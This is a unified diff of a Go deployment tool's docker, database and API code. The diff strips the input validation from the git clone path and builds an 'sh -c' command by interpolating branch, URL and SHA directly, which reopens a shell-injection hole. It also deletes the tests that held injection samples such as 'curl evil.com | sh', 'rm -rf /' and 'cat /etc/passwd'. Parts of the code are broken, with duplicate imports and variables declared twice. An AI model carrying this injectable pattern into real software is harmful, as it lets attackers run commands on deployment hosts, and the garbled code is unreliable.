@@ -160,65 +158,6 @@ func (d *Database) connect(ctx context.Context) error {
 		return fmt.Errorf("failed to run migrations: %w", err)
 	}
 	// Backfill webhook_secret_hash for any rows that have a secret but no hash
 	err = d.backfillWebhookSecretHashes(ctx)
 	if err != nil {
 		return fmt.Errorf("failed to backfill webhook secret hashes: %w", err)
 	}
 	return nil
 }
 // HashWebhookSecret returns the hex-encoded SHA-256 hash of a webhook secret.
 func HashWebhookSecret(secret string) string {
 	sum := sha256.Sum256([]byte(secret))
 	return hex.EncodeToString(sum[:])
 }
 func (d *Database) backfillWebhookSecretHashes(ctx context.Context) error {
 	rows, err := d.database.QueryContext(ctx,
 		"SELECT id, webhook_secret FROM apps WHERE webhook_secret_hash = '' AND webhook_secret != ''")
 	if err != nil {
 		return fmt.Errorf("querying apps for backfill: %w", err)
 	}
 	defer func() { _ = rows.Close() }()
 	type row struct {
 		id, secret string
 	}
 	var toUpdate []row
 	for rows.Next() {
 		var r row
 		scanErr := rows.Scan(&r.id, &r.secret)
 		if scanErr != nil {
 			return fmt.Errorf("scanning app for backfill: %w", scanErr)
 		}
 		toUpdate = append(toUpdate, r)
 	}
 	rowsErr := rows.Err()
 	if rowsErr != nil {
 		return fmt.Errorf("iterating apps for backfill: %w", rowsErr)
 	}
 	for _, r := range toUpdate {
 		hash := HashWebhookSecret(r.secret)
 		_, updateErr := d.database.ExecContext(ctx,
 			"UPDATE apps SET webhook_secret_hash = ? WHERE id = ?", hash, r.id)
 		if updateErr != nil {
 			return fmt.Errorf("updating webhook_secret_hash for app %s: %w", r.id, updateErr)
 		}
 		d.log.Info("backfilled webhook_secret_hash", "app_id", r.id)
 	}
 	return nil
 }
--- a/internal/database/hash_test.go
+++ b/internal/database/hash_test.go
@@ -1,28 +0,0 @@
 package database_test
 import (
 	"testing"
 	"github.com/stretchr/testify/assert"
 	"sneak.berlin/go/upaas/internal/database"
 )
 func TestHashWebhookSecret(t *testing.T) {
 	t.Parallel()
 	// Known SHA-256 of "test-secret"
 	hash := database.HashWebhookSecret("test-secret")
 	assert.Equal(t,
 		"9caf06bb4436cdbfa20af9121a626bc1093c4f54b31c0fa937957856135345b6",
 		hash,
 	)
 	// Different secrets produce different hashes
 	hash2 := database.HashWebhookSecret("other-secret")
 	assert.NotEqual(t, hash, hash2)
 	// Same secret always produces same hash (deterministic)
 	hash3 := database.HashWebhookSecret("test-secret")
 	assert.Equal(t, hash, hash3)
 }
--- a/internal/database/migrations.go
+++ b/internal/database/migrations.go
@@ -113,9 +113,9 @@ func (d *Database) applyMigration(ctx context.Context, filename string) error {
 		return fmt.Errorf("failed to record migration: %w", err)
 	}
-	err = transaction.Commit()
+	commitErr := transaction.Commit()
-	if err != nil {
+	if commitErr != nil {
-		return fmt.Errorf("failed to commit migration: %w", err)
+		return fmt.Errorf("failed to commit migration: %w", commitErr)
 	}
 	return nil
--- a/internal/database/migrations/005_add_webhook_secret_hash.sql
+++ b/internal/database/migrations/005_add_webhook_secret_hash.sql
@@ -1,2 +0,0 @@
 -- Add webhook_secret_hash column for constant-time secret lookup
 ALTER TABLE apps ADD COLUMN webhook_secret_hash TEXT NOT NULL DEFAULT '';
--- a/internal/database/migrations/006_add_previous_image_id.sql
+++ b/internal/database/migrations/006_add_previous_image_id.sql
@@ -1,2 +0,0 @@
 -- Add previous_image_id to apps for deployment rollback support
 ALTER TABLE apps ADD COLUMN previous_image_id TEXT;
--- a/internal/database/testing.go
+++ b/internal/database/testing.go
@@ -1,41 +0,0 @@
 package database
 import (
 	"log/slog"
 	"os"
 	"testing"
 	"sneak.berlin/go/upaas/internal/config"
 	"sneak.berlin/go/upaas/internal/logger"
 )
 // NewTestDatabase creates an in-memory Database for testing.
 // It runs migrations so all tables are available.
 func NewTestDatabase(t *testing.T) *Database {
 	t.Helper()
 	tmpDir := t.TempDir()
 	cfg := &config.Config{
 		DataDir: tmpDir,
 	}
 	log := slog.New(slog.NewTextHandler(os.Stderr, nil))
 	logWrapper := logger.NewForTest(log)
 	db, err := New(nil, Params{
 		Logger: logWrapper,
 		Config: cfg,
 	})
 	if err != nil {
 		t.Fatalf("failed to create test database: %v", err)
 	}
 	t.Cleanup(func() {
 		if db.database != nil {
 			_ = db.database.Close()
 		}
 	})
 	return db
 }
--- a/internal/docker/client.go
+++ b/internal/docker/client.go
@@ -10,14 +10,12 @@ import (
 	"log/slog"
 	"os"
 	"path/filepath"
 	"regexp"
 	"strconv"
 	"strings"
-	dockertypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/image"
 	"github.com/docker/docker/api/types/mount"
 	"github.com/docker/docker/api/types/network"
 	"github.com/docker/docker/client"
@@ -25,9 +23,8 @@ import (
 	"github.com/docker/go-connections/nat"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-
+	"git.eeqj.de/sneak/upaas/internal/logger"
 	"sneak.berlin/go/upaas/internal/logger"
 )
 // sshKeyPermissions is the file permission for SSH private keys.
@@ -49,18 +46,6 @@ var ErrNotConnected = errors.New("docker client not connected")
 // ErrGitCloneFailed is returned when git clone fails.
 var ErrGitCloneFailed = errors.New("git clone failed")
 // ErrInvalidBranch is returned when a branch name contains invalid characters.
 var ErrInvalidBranch = errors.New("invalid branch name")
 // ErrInvalidCommitSHA is returned when a commit SHA is not a valid hex string.
 var ErrInvalidCommitSHA = errors.New("invalid commit SHA")
 // validBranchRe matches safe git branch names.
 var validBranchRe = regexp.MustCompile(`^[a-zA-Z0-9._/\-]+$`)
 // validCommitSHARe matches a full-length hex commit SHA.
 var validCommitSHARe = regexp.MustCompile(`^[0-9a-f]{40}$`)
 // Params contains dependencies for Client.
 type Params struct {
 	fx.In
@@ -117,7 +102,7 @@ type BuildImageOptions struct {
 func (c *Client) BuildImage(
 	ctx context.Context,
 	opts BuildImageOptions,
-) (ImageID, error) {
+) (string, error) {
 	if c.docker == nil {
 		return "", ErrNotConnected
 	}
@@ -189,7 +174,7 @@ func buildPortConfig(ports []PortMapping) (nat.PortSet, nat.PortMap) {
 func (c *Client) CreateContainer(
 	ctx context.Context,
 	opts CreateContainerOptions,
-) (ContainerID, error) {
+) (string, error) {
 	if c.docker == nil {
 		return "", ErrNotConnected
 	}
@@ -242,18 +227,18 @@ func (c *Client) CreateContainer(
 		return "", fmt.Errorf("failed to create container: %w", err)
 	}
-	return ContainerID(resp.ID), nil
+	return resp.ID, nil
 }
 // StartContainer starts a container.
-func (c *Client) StartContainer(ctx context.Context, containerID ContainerID) error {
+func (c *Client) StartContainer(ctx context.Context, containerID string) error {
 	if c.docker == nil {
 		return ErrNotConnected
 	}
 	c.log.Info("starting container", "id", containerID)
-	err := c.docker.ContainerStart(ctx, containerID.String(), container.StartOptions{})
+	err := c.docker.ContainerStart(ctx, containerID, container.StartOptions{})
 	if err != nil {
 		return fmt.Errorf("failed to start container: %w", err)
 	}
@@ -262,7 +247,7 @@ func (c *Client) StartContainer(ctx context.Context, containerID ContainerID) er
 }
 // StopContainer stops a container.
-func (c *Client) StopContainer(ctx context.Context, containerID ContainerID) error {
+func (c *Client) StopContainer(ctx context.Context, containerID string) error {
 	if c.docker == nil {
 		return ErrNotConnected
 	}
@@ -271,7 +256,7 @@ func (c *Client) StopContainer(ctx context.Context, containerID ContainerID) err
 	timeout := stopTimeoutSeconds
-	err := c.docker.ContainerStop(ctx, containerID.String(), container.StopOptions{Timeout: &timeout})
+	err := c.docker.ContainerStop(ctx, containerID, container.StopOptions{Timeout: &timeout})
 	if err != nil {
 		return fmt.Errorf("failed to stop container: %w", err)
 	}
@@ -282,7 +267,7 @@ func (c *Client) StopContainer(ctx context.Context, containerID ContainerID) err
 // RemoveContainer removes a container.
 func (c *Client) RemoveContainer(
 	ctx context.Context,
-	containerID ContainerID,
+	containerID string,
 	force bool,
 ) error {
 	if c.docker == nil {
@@ -291,7 +276,7 @@ func (c *Client) RemoveContainer(
 	c.log.Info("removing container", "id", containerID, "force", force)
-	err := c.docker.ContainerRemove(ctx, containerID.String(), container.RemoveOptions{Force: force})
+	err := c.docker.ContainerRemove(ctx, containerID, container.RemoveOptions{Force: force})
 	if err != nil {
 		return fmt.Errorf("failed to remove container: %w", err)
 	}
@@ -302,7 +287,7 @@ func (c *Client) RemoveContainer(
 // ContainerLogs returns the logs for a container.
 func (c *Client) ContainerLogs(
 	ctx context.Context,
-	containerID ContainerID,
+	containerID string,
 	tail string,
 ) (string, error) {
 	if c.docker == nil {
@@ -315,7 +300,7 @@ func (c *Client) ContainerLogs(
 		Tail:       tail,
 	}
-	reader, err := c.docker.ContainerLogs(ctx, containerID.String(), opts)
+	reader, err := c.docker.ContainerLogs(ctx, containerID, opts)
 	if err != nil {
 		return "", fmt.Errorf("failed to get container logs: %w", err)
 	}
@@ -338,13 +323,13 @@ func (c *Client) ContainerLogs(
 // IsContainerRunning checks if a container is running.
 func (c *Client) IsContainerRunning(
 	ctx context.Context,
-	containerID ContainerID,
+	containerID string,
 ) (bool, error) {
 	if c.docker == nil {
 		return false, ErrNotConnected
 	}
-	inspect, err := c.docker.ContainerInspect(ctx, containerID.String())
+	inspect, err := c.docker.ContainerInspect(ctx, containerID)
 	if err != nil {
 		return false, fmt.Errorf("failed to inspect container: %w", err)
 	}
@@ -355,13 +340,13 @@ func (c *Client) IsContainerRunning(
 // IsContainerHealthy checks if a container is healthy.
 func (c *Client) IsContainerHealthy(
 	ctx context.Context,
-	containerID ContainerID,
+	containerID string,
 ) (bool, error) {
 	if c.docker == nil {
 		return false, ErrNotConnected
 	}
-	inspect, err := c.docker.ContainerInspect(ctx, containerID.String())
+	inspect, err := c.docker.ContainerInspect(ctx, containerID)
 	if err != nil {
 		return false, fmt.Errorf("failed to inspect container: %w", err)
 	}
@@ -379,7 +364,7 @@ const LabelUpaasID = "upaas.id"
 // ContainerInfo contains basic information about a container.
 type ContainerInfo struct {
-	ID      ContainerID
+	ID      string
 	Running bool
 }
@@ -414,7 +399,7 @@ func (c *Client) FindContainerByAppID(
 	ctr := containers[0]
 	return &ContainerInfo{
-		ID:      ContainerID(ctr.ID),
+		ID:      ctr.ID,
 		Running: ctr.State == "running",
 	}, nil
 }
@@ -445,15 +430,6 @@ func (c *Client) CloneRepo(
 	ctx context.Context,
 	repoURL, branch, commitSHA, sshPrivateKey, containerDir, hostDir string,
 ) (*CloneResult, error) {
 	// Validate inputs to prevent shell injection
 	if !validBranchRe.MatchString(branch) {
 		return nil, fmt.Errorf("%w: %q", ErrInvalidBranch, branch)
 	}
 	if commitSHA != "" && !validCommitSHARe.MatchString(commitSHA) {
 		return nil, fmt.Errorf("%w: %q", ErrInvalidCommitSHA, commitSHA)
 	}
 	if c.docker == nil {
 		return nil, ErrNotConnected
 	}
@@ -481,24 +457,10 @@ func (c *Client) CloneRepo(
 	return c.performClone(ctx, cfg)
 }
 // RemoveImage removes a Docker image by ID or tag.
 // It returns nil if the image was successfully removed or does not exist.
 func (c *Client) RemoveImage(ctx context.Context, imageID ImageID) error {
 	_, err := c.docker.ImageRemove(ctx, imageID.String(), image.RemoveOptions{
 		Force:         true,
 		PruneChildren: true,
 	})
 	if err != nil && !client.IsErrNotFound(err) {
 		return fmt.Errorf("failed to remove image %s: %w", imageID, err)
 	}
 	return nil
 }
 func (c *Client) performBuild(
 	ctx context.Context,
 	opts BuildImageOptions,
-) (ImageID, error) {
+) (string, error) {
 	// Create tar archive of build context
 	tarArchive, err := archive.TarWithOptions(opts.ContextDir, &archive.TarOptions{})
 	if err != nil {
@@ -513,7 +475,7 @@ func (c *Client) performBuild(
 	}()
 	// Build image
-	resp, err := c.docker.ImageBuild(ctx, tarArchive, dockertypes.ImageBuildOptions{
+	resp, err := c.docker.ImageBuild(ctx, tarArchive, types.ImageBuildOptions{
 		Dockerfile: opts.DockerfilePath,
 		Tags:       opts.Tags,
 		Remove:     true,
@@ -543,7 +505,7 @@ func (c *Client) performBuild(
 			return "", fmt.Errorf("failed to inspect image: %w", inspectErr)
 		}
-		return ImageID(inspect.ID), nil
+		return inspect.ID, nil
 	}
 	return "", nil
@@ -604,57 +566,57 @@ func (c *Client) performClone(ctx context.Context, cfg *cloneConfig) (*CloneResu
 		}
 	}()
-	gitContainerID, err := c.createGitContainer(ctx, cfg)
+	containerID, err := c.createGitContainer(ctx, cfg)
 	if err != nil {
 		return nil, err
 	}
 	defer func() {
-		_ = c.docker.ContainerRemove(ctx, gitContainerID.String(), container.RemoveOptions{Force: true})
+		_ = c.docker.ContainerRemove(ctx, containerID, container.RemoveOptions{Force: true})
 	}()
-	return c.runGitClone(ctx, gitContainerID)
+	return c.runGitClone(ctx, containerID)
 }
 func (c *Client) createGitContainer(
 	ctx context.Context,
 	cfg *cloneConfig,
-) (ContainerID, error) {
+) (string, error) {
 	gitSSHCmd := "ssh -i /keys/deploy_key -o StrictHostKeyChecking=no"
-	// Build the git command using environment variables to avoid shell injection.
+	// Build the git command based on whether we have a specific commit SHA
-	// Arguments are passed via env vars and quoted in the shell script.
+	var cmd []string
-	var script string
+
 	var entrypoint []string
 	if cfg.commitSHA != "" {
 		// Clone without depth limit so we can checkout any commit, then checkout specific SHA
-		script = `git clone --branch "$CLONE_BRANCH" "$CLONE_URL" /repo` +
+		// Using sh -c to run multiple commands - need to clear entrypoint
-			` && cd /repo && git checkout "$CLONE_SHA"` +
+		// Output "COMMIT:<sha>" marker at end for parsing
-			` && echo COMMIT:$(git rev-parse HEAD)`
+		script := fmt.Sprintf(
 			"git clone --branch %s %s /repo && cd /repo && git checkout %s && echo COMMIT:$(git rev-parse HEAD)",
 			cfg.branch, cfg.repoURL, cfg.commitSHA,
 		)
 		entrypoint = []string{}
 		cmd = []string{"sh", "-c", script}
 	} else {
 		// Shallow clone of branch HEAD, then output commit SHA
-		script = `git clone --depth 1 --branch "$CLONE_BRANCH" "$CLONE_URL" /repo` +
+		// Using sh -c to run multiple commands
-			` && cd /repo && echo COMMIT:$(git rev-parse HEAD)`
+		script := fmt.Sprintf(
 			"git clone --depth 1 --branch %s %s /repo && cd /repo && echo COMMIT:$(git rev-parse HEAD)",
 			cfg.branch, cfg.repoURL,
 		)
 		entrypoint = []string{}
 		cmd = []string{"sh", "-c", script}
 	}
 	env := []string{
 		"GIT_SSH_COMMAND=" + gitSSHCmd,
 		"CLONE_URL=" + cfg.repoURL,
 		"CLONE_BRANCH=" + cfg.branch,
 	}
 	if cfg.commitSHA != "" {
 		env = append(env, "CLONE_SHA="+cfg.commitSHA)
 	}
 	entrypoint := []string{}
 	cmd := []string{"sh", "-c", script}
 	// Use host paths for Docker bind mounts (Docker runs on the host, not in our container)
 	resp, err := c.docker.ContainerCreate(ctx,
 		&container.Config{
 			Image:      gitImage,
 			Entrypoint: entrypoint,
 			Cmd:        cmd,
-			Env:        env,
+			Env:        []string{"GIT_SSH_COMMAND=" + gitSSHCmd},
 			WorkingDir: "/",
 		},
 		&container.HostConfig{
@@ -676,16 +638,16 @@ func (c *Client) createGitContainer(
 		return "", fmt.Errorf("failed to create git container: %w", err)
 	}
-	return ContainerID(resp.ID), nil
+	return resp.ID, nil
 }
-func (c *Client) runGitClone(ctx context.Context, containerID ContainerID) (*CloneResult, error) {
+func (c *Client) runGitClone(ctx context.Context, containerID string) (*CloneResult, error) {
-	err := c.docker.ContainerStart(ctx, containerID.String(), container.StartOptions{})
+	err := c.docker.ContainerStart(ctx, containerID, container.StartOptions{})
 	if err != nil {
 		return nil, fmt.Errorf("failed to start git container: %w", err)
 	}
-	statusCh, errCh := c.docker.ContainerWait(ctx, containerID.String(), container.WaitConditionNotRunning)
+	statusCh, errCh := c.docker.ContainerWait(ctx, containerID, container.WaitConditionNotRunning)
 	select {
 	case err := <-errCh:
--- a/internal/docker/types.go
+++ b/internal/docker/types.go
@@ -1,13 +0,0 @@
 package docker
 // ImageID is a Docker image identifier (ID or tag).
 type ImageID string
 // String implements the fmt.Stringer interface.
 func (id ImageID) String() string { return string(id) }
 // ContainerID is a Docker container identifier.
 type ContainerID string
 // String implements the fmt.Stringer interface.
 func (id ContainerID) String() string { return string(id) }
--- a/internal/docker/validation_test.go
+++ b/internal/docker/validation_test.go
@@ -1,148 +0,0 @@
 package docker //nolint:testpackage // tests unexported regexps and Client struct
 import (
 	"errors"
 	"log/slog"
 	"testing"
 )
 func TestValidBranchRegex(t *testing.T) {
 	t.Parallel()
 	valid := []string{
 		"main",
 		"develop",
 		"feature/my-feature",
 		"release-1.0",
 		"v1.2.3",
 		"fix/issue_42",
 		"my.branch",
 	}
 	for _, b := range valid {
 		if !validBranchRe.MatchString(b) {
 			t.Errorf("expected branch %q to be valid", b)
 		}
 	}
 	invalid := []string{
 		"main; curl evil.com | sh",
 		"branch$(whoami)",
 		"branch`id`",
 		"branch && rm -rf /",
 		"branch | cat /etc/passwd",
 		"",
 		"branch name with spaces",
 		"branch\nnewline",
 	}
 	for _, b := range invalid {
 		if validBranchRe.MatchString(b) {
 			t.Errorf("expected branch %q to be invalid (potential injection)", b)
 		}
 	}
 }
 func TestValidCommitSHARegex(t *testing.T) {
 	t.Parallel()
 	valid := []string{
 		"abc123def456789012345678901234567890abcd",
 		"0000000000000000000000000000000000000000",
 		"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
 	}
 	for _, s := range valid {
 		if !validCommitSHARe.MatchString(s) {
 			t.Errorf("expected SHA %q to be valid", s)
 		}
 	}
 	invalid := []string{
 		"short",
 		"abc123",
 		"ABCDEF1234567890123456789012345678901234", // uppercase
 		"abc123def456789012345678901234567890abcd; rm -rf /",
 		"$(whoami)000000000000000000000000000000000",
 		"",
 	}
 	for _, s := range invalid {
 		if validCommitSHARe.MatchString(s) {
 			t.Errorf("expected SHA %q to be invalid (potential injection)", s)
 		}
 	}
 }
 func TestCloneRepoRejectsInjection(t *testing.T) { //nolint:funlen // table-driven test
 	t.Parallel()
 	c := &Client{
 		log: slog.Default(),
 	}
 	tests := []struct {
 		name      string
 		branch    string
 		commitSHA string
 		wantErr   error
 	}{
 		{
 			name:    "shell injection in branch",
 			branch:  "main; curl evil.com | sh #",
 			wantErr: ErrInvalidBranch,
 		},
 		{
 			name:    "command substitution in branch",
 			branch:  "$(whoami)",
 			wantErr: ErrInvalidBranch,
 		},
 		{
 			name:    "backtick injection in branch",
 			branch:  "`id`",
 			wantErr: ErrInvalidBranch,
 		},
 		{
 			name:      "injection in commitSHA",
 			branch:    "main",
 			commitSHA: "not-a-sha; rm -rf /",
 			wantErr:   ErrInvalidCommitSHA,
 		},
 		{
 			name:      "short SHA rejected",
 			branch:    "main",
 			commitSHA: "abc123",
 			wantErr:   ErrInvalidCommitSHA,
 		},
 		{
 			name:      "valid inputs pass validation (hit NotConnected)",
 			branch:    "main",
 			commitSHA: "abc123def456789012345678901234567890abcd",
 			wantErr:   ErrNotConnected,
 		},
 		{
 			name:    "valid branch no SHA passes validation (hit NotConnected)",
 			branch:  "main",
 			wantErr: ErrNotConnected,
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			t.Parallel()
 			_, err := c.CloneRepo(
 				t.Context(),
 				"git@example.com:repo.git",
 				tt.branch,
 				tt.commitSHA,
 				"fake-key",
 				"/tmp/container",
 				"/tmp/host",
 			)
 			if err == nil {
 				t.Fatal("expected error, got nil")
 			}
 			if !errors.Is(err, tt.wantErr) {
 				t.Errorf("expected error %v, got %v", tt.wantErr, err)
 			}
 		})
 	}
 }
--- a/internal/handlers/api.go
+++ b/internal/handlers/api.go
@@ -1,245 +0,0 @@
 package handlers
 import (
 	"encoding/json"
 	"net/http"
 	"strconv"
 	"github.com/go-chi/chi/v5"
 	"sneak.berlin/go/upaas/internal/models"
 )
 // apiAppResponse is the JSON representation of an app.
 type apiAppResponse struct {
 	ID             string `json:"id"`
 	Name           string `json:"name"`
 	RepoURL        string `json:"repoUrl"`
 	Branch         string `json:"branch"`
 	DockerfilePath string `json:"dockerfilePath"`
 	Status         string `json:"status"`
 	WebhookSecret  string `json:"webhookSecret"`
 	SSHPublicKey   string `json:"sshPublicKey"`
 	CreatedAt      string `json:"createdAt"`
 	UpdatedAt      string `json:"updatedAt"`
 }
 // apiDeploymentResponse is the JSON representation of a deployment.
 type apiDeploymentResponse struct {
 	ID         int64  `json:"id"`
 	AppID      string `json:"appId"`
 	CommitSHA  string `json:"commitSha,omitempty"`
 	Status     string `json:"status"`
 	Duration   string `json:"duration,omitempty"`
 	StartedAt  string `json:"startedAt"`
 	FinishedAt string `json:"finishedAt,omitempty"`
 }
 func appToAPI(a *models.App) apiAppResponse {
 	return apiAppResponse{
 		ID:             a.ID,
 		Name:           a.Name,
 		RepoURL:        a.RepoURL,
 		Branch:         a.Branch,
 		DockerfilePath: a.DockerfilePath,
 		Status:         string(a.Status),
 		WebhookSecret:  a.WebhookSecret,
 		SSHPublicKey:   a.SSHPublicKey,
 		CreatedAt:      a.CreatedAt.Format("2006-01-02T15:04:05Z"),
 		UpdatedAt:      a.UpdatedAt.Format("2006-01-02T15:04:05Z"),
 	}
 }
 func deploymentToAPI(d *models.Deployment) apiDeploymentResponse {
 	resp := apiDeploymentResponse{
 		ID:        d.ID,
 		AppID:     d.AppID,
 		Status:    string(d.Status),
 		Duration:  d.Duration(),
 		StartedAt: d.StartedAt.Format("2006-01-02T15:04:05Z"),
 	}
 	if d.CommitSHA.Valid {
 		resp.CommitSHA = d.CommitSHA.String
 	}
 	if d.FinishedAt.Valid {
 		resp.FinishedAt = d.FinishedAt.Time.Format("2006-01-02T15:04:05Z")
 	}
 	return resp
 }
 // HandleAPILoginPOST returns a handler that authenticates via JSON credentials
 // and sets a session cookie.
 func (h *Handlers) HandleAPILoginPOST() http.HandlerFunc {
 	type loginResponse struct {
 		UserID   int64  `json:"userId"`
 		Username string `json:"username"`
 	}
 	return func(writer http.ResponseWriter, request *http.Request) {
 		var req map[string]string
 		decodeErr := json.NewDecoder(request.Body).Decode(&req)
 		if decodeErr != nil {
 			h.respondJSON(writer, request,
 				map[string]string{"error": "invalid JSON body"},
 				http.StatusBadRequest)
 			return
 		}
 		username := req["username"]
 		credential := req["password"]
 		if username == "" || credential == "" {
 			h.respondJSON(writer, request,
 				map[string]string{"error": "username and password are required"},
 				http.StatusBadRequest)
 			return
 		}
 		user, authErr := h.auth.Authenticate(request.Context(), username, credential)
 		if authErr != nil {
 			h.respondJSON(writer, request,
 				map[string]string{"error": "invalid credentials"},
 				http.StatusUnauthorized)
 			return
 		}
 		sessionErr := h.auth.CreateSession(writer, request, user)
 		if sessionErr != nil {
 			h.log.Error("api: failed to create session", "error", sessionErr)
 			h.respondJSON(writer, request,
 				map[string]string{"error": "failed to create session"},
 				http.StatusInternalServerError)
 			return
 		}
 		h.respondJSON(writer, request, loginResponse{
 			UserID:   user.ID,
 			Username: user.Username,
 		}, http.StatusOK)
 	}
 }
 // HandleAPIListApps returns a handler that lists all apps as JSON.
 func (h *Handlers) HandleAPIListApps() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		apps, err := h.appService.ListApps(request.Context())
 		if err != nil {
 			h.respondJSON(writer, request,
 				map[string]string{"error": "failed to list apps"},
 				http.StatusInternalServerError)
 			return
 		}
 		result := make([]apiAppResponse, 0, len(apps))
 		for _, a := range apps {
 			result = append(result, appToAPI(a))
 		}
 		h.respondJSON(writer, request, result, http.StatusOK)
 	}
 }
 // HandleAPIGetApp returns a handler that gets a single app by ID.
 func (h *Handlers) HandleAPIGetApp() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
 		application, err := h.appService.GetApp(request.Context(), appID)
 		if err != nil {
 			h.respondJSON(writer, request,
 				map[string]string{"error": "internal server error"},
 				http.StatusInternalServerError)
 			return
 		}
 		if application == nil {
 			h.respondJSON(writer, request,
 				map[string]string{"error": "app not found"},
 				http.StatusNotFound)
 			return
 		}
 		h.respondJSON(writer, request, appToAPI(application), http.StatusOK)
 	}
 }
 // deploymentsPageLimit is the default number of deployments per page.
 const deploymentsPageLimit = 20
 // HandleAPIListDeployments returns a handler that lists deployments for an app.
 func (h *Handlers) HandleAPIListDeployments() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
 		application, err := h.appService.GetApp(request.Context(), appID)
 		if err != nil || application == nil {
 			h.respondJSON(writer, request,
 				map[string]string{"error": "app not found"},
 				http.StatusNotFound)
 			return
 		}
 		limit := deploymentsPageLimit
 		if l := request.URL.Query().Get("limit"); l != "" {
 			parsed, parseErr := strconv.Atoi(l)
 			if parseErr == nil && parsed > 0 {
 				limit = parsed
 			}
 		}
 		deployments, deployErr := application.GetDeployments(
 			request.Context(), limit,
 		)
 		if deployErr != nil {
 			h.respondJSON(writer, request,
 				map[string]string{"error": "failed to list deployments"},
 				http.StatusInternalServerError)
 			return
 		}
 		result := make([]apiDeploymentResponse, 0, len(deployments))
 		for _, d := range deployments {
 			result = append(result, deploymentToAPI(d))
 		}
 		h.respondJSON(writer, request, result, http.StatusOK)
 	}
 }
 // HandleAPIWhoAmI returns a handler that shows the current authenticated user.
 func (h *Handlers) HandleAPIWhoAmI() http.HandlerFunc {
 	type whoAmIResponse struct {
 		UserID   int64  `json:"userId"`
 		Username string `json:"username"`
 	}
 	return func(writer http.ResponseWriter, request *http.Request) {
 		user, err := h.auth.GetCurrentUser(request.Context(), request)
 		if err != nil || user == nil {
 			h.respondJSON(writer, request,
 				map[string]string{"error": "unauthorized"},
 				http.StatusUnauthorized)
 			return
 		}
 		h.respondJSON(writer, request, whoAmIResponse{
 			UserID:   user.ID,
 			Username: user.Username,
 		}, http.StatusOK)
 	}
 }
--- a/internal/handlers/api_test.go
+++ b/internal/handlers/api_test.go
@@ -1,236 +0,0 @@
 package handlers_test
 import (
 	"encoding/json"
 	"net/http"
 	"net/http/httptest"
 	"strings"
 	"testing"
 	"github.com/go-chi/chi/v5"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 	"sneak.berlin/go/upaas/internal/service/app"
 )
 // apiRouter builds a chi router with the API routes using session auth middleware.
 func apiRouter(tc *testContext) http.Handler {
 	r := chi.NewRouter()
 	r.Route("/api/v1", func(apiR chi.Router) {
 		apiR.Post("/login", tc.handlers.HandleAPILoginPOST())
 		apiR.Group(func(apiR chi.Router) {
 			apiR.Use(tc.middleware.APISessionAuth())
 			apiR.Get("/whoami", tc.handlers.HandleAPIWhoAmI())
 			apiR.Get("/apps", tc.handlers.HandleAPIListApps())
 			apiR.Get("/apps/{id}", tc.handlers.HandleAPIGetApp())
 			apiR.Get("/apps/{id}/deployments", tc.handlers.HandleAPIListDeployments())
 		})
 	})
 	return r
 }
 // setupAPITest creates a test context with a user and returns session cookies.
 func setupAPITest(t *testing.T) (*testContext, []*http.Cookie) {
 	t.Helper()
 	tc := setupTestHandlers(t)
 	// Create a user.
 	_, err := tc.authSvc.CreateUser(t.Context(), "admin", "password123")
 	require.NoError(t, err)
 	// Login via the API to get session cookies.
 	r := apiRouter(tc)
 	loginBody := `{"username":"admin","password":"password123"}`
 	req := httptest.NewRequest(http.MethodPost, "/api/v1/login", strings.NewReader(loginBody))
 	req.Header.Set("Content-Type", "application/json")
 	rr := httptest.NewRecorder()
 	r.ServeHTTP(rr, req)
 	require.Equal(t, http.StatusOK, rr.Code)
 	cookies := rr.Result().Cookies()
 	require.NotEmpty(t, cookies, "login should return session cookies")
 	return tc, cookies
 }
 // apiGet makes an authenticated GET request using session cookies.
 func apiGet(
 	t *testing.T,
 	tc *testContext,
 	cookies []*http.Cookie,
 	path string,
 ) *httptest.ResponseRecorder {
 	t.Helper()
 	req := httptest.NewRequest(http.MethodGet, path, nil)
 	for _, c := range cookies {
 		req.AddCookie(c)
 	}
 	rr := httptest.NewRecorder()
 	r := apiRouter(tc)
 	r.ServeHTTP(rr, req)
 	return rr
 }
 func TestAPILoginSuccess(t *testing.T) {
 	t.Parallel()
 	tc := setupTestHandlers(t)
 	_, err := tc.authSvc.CreateUser(t.Context(), "admin", "password123")
 	require.NoError(t, err)
 	r := apiRouter(tc)
 	body := `{"username":"admin","password":"password123"}`
 	req := httptest.NewRequest(http.MethodPost, "/api/v1/login", strings.NewReader(body))
 	req.Header.Set("Content-Type", "application/json")
 	rr := httptest.NewRecorder()
 	r.ServeHTTP(rr, req)
 	assert.Equal(t, http.StatusOK, rr.Code)
 	var resp map[string]any
 	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &resp))
 	assert.Equal(t, "admin", resp["username"])
 	// Should have a Set-Cookie header.
 	assert.NotEmpty(t, rr.Result().Cookies())
 }
 func TestAPILoginInvalidCredentials(t *testing.T) {
 	t.Parallel()
 	tc := setupTestHandlers(t)
 	_, err := tc.authSvc.CreateUser(t.Context(), "admin", "password123")
 	require.NoError(t, err)
 	r := apiRouter(tc)
 	body := `{"username":"admin","password":"wrong"}`
 	req := httptest.NewRequest(http.MethodPost, "/api/v1/login", strings.NewReader(body))
 	req.Header.Set("Content-Type", "application/json")
 	rr := httptest.NewRecorder()
 	r.ServeHTTP(rr, req)
 	assert.Equal(t, http.StatusUnauthorized, rr.Code)
 }
 func TestAPILoginMissingFields(t *testing.T) {
 	t.Parallel()
 	tc := setupTestHandlers(t)
 	r := apiRouter(tc)
 	body := `{"username":"","password":""}`
 	req := httptest.NewRequest(http.MethodPost, "/api/v1/login", strings.NewReader(body))
 	req.Header.Set("Content-Type", "application/json")
 	rr := httptest.NewRecorder()
 	r.ServeHTTP(rr, req)
 	assert.Equal(t, http.StatusBadRequest, rr.Code)
 }
